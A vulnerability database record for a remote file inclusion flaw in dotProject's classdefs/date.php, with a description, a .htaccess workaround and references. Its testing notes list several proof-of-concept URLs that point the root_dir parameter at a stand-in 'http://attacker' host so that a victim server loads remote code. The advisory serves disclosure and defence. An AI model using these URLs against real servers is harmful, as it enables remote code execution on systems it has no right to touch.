{"title": "dotProject classdefs/date.php $root_dir Arbitrary File Include", "published": "2003-01-29T00:00:00", "references": [], "type": "osvdb", "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "cvelist": [], "viewCount": 0, "affectedSoftware": [{"version": "dev20030121", "name": "dotProject", "operator": "eq"}], "hash": "351ed339ccb54983e590bc335c39372e477852dc2bd9d6b386a484599d2826c6", "id": "OSVDB:3592", "modified": "2003-01-29T00:00:00", "history": [], "href": "https://vulners.com/osvdb/OSVDB:3592", "hashmap": [{"hash": "3e9850fae030a739259d9f83e3f72f2e", "key": "affectedSoftware"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b34ef7618431bd84815d2a79fad5dc8f", "key": "description"}, {"hash": "915dd5cbc5fe791777ca72bca3a2435d", "key": "href"}, {"hash": "b67c1dfa4370b6f104604c30732020d8", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "b67c1dfa4370b6f104604c30732020d8", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "955b328dc7cd615c13af5464c9183464", "key": "reporter"}, {"hash": "ee95b064a4456b6a8c2b902b20208499", "key": "title"}, {"hash": "1327ac71f7914948578f08c54f772b10", "key": "type"}], "objectVersion": "1.2", "edition": 1, "description": "## Vulnerability Description\ndotProject contains a flaw that allows a remote attacker to include arbitrary files. The issue is due to numerous scripts that call the classdefs/date.php script without defining or restricting the $root_dir variable. This allows an attacker to set the variable to an arbitrary server/path/file name which may include malicious commands that would be executed on the vulnerable server.\n## Solution Description\nCurrently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: \ncreate a .htaccess file that contains 'Deny from all' in the /modules/ directory.\n## Short Description\ndotProject contains a flaw that allows a remote attacker to include arbitrary files. The issue is due to numerous scripts that call the classdefs/date.php script without defining or restricting the $root_dir variable. This allows an attacker to set the variable to an arbitrary server/path/file name which may include malicious commands that would be executed on the vulnerable server.\n## Manual Testing Notes\nhttp://[victim]/dotproject/modules/files/index_table.php?root_dir=http://attacker\nhttp://[victim]/dotproject/modules/projects/addedit.php?root_dir=http://attacker\nhttp://[victim]/dotproject/modules/projects/view.php?root_dir=http://attacker\nhttp://[victim]/dotproject/modules/projects/vw_files.php?root_dir=http://attacker\nhttp://[victim]/dotproject/modules/tasks/addedit.php?root_dir=http://attacker\nhttp://[victim]/dotproject/modules/tasks/viewgantt.php?root_dir=http://attacker\n## References:\nVendor URL: http://www.dotproject.net/\n[Secunia Advisory ID:7974](https://secuniaresearch.flexerasoftware.com/advisories/7974/)\n[Related OSVDB ID: 3593](https://vulners.com/osvdb/OSVDB:3593)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2003-01/0344.html\nISS X-Force ID: 11192\nBugtraq ID: 6710\n", "bulletinFamily": "software", "reporter": "OSVDB", "cvss": {"vector": "NONE", "score": 0.0}, "lastseen": "2017-04-28T13:19:58"}

{}